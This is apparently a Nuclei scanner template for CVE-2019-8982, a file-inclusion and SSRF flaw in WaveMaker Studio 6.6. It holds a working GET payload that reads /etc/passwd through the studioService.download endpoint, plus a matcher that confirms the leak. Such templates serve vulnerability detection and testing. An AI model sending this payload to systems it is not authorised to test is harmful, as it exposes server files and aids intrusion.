nuclei-templates/cves/2019/CVE-2019-8982.yaml

34 lines
1009 B
YAML

id: CVE-2019-8982
info:
name: Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery
author: madrobot
severity: critical
description: "WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value in com/wavemaker/studio/StudioService.java, leading to disclosure of local files and server-side request forgery."
reference:
- https://www.exploit-db.com/exploits/45158
- https://nvd.nist.gov/vuln/detail/CVE-2019-8982
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
cvss-score: 9.6
cve-id: CVE-2019-8982
cwe-id: CWE-918
tags: cve,cve2019,wavemaker,lfi,ssrf
requests:
- method: GET
path:
- "{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
part: body
# Enhanced by mp on 2022/05/03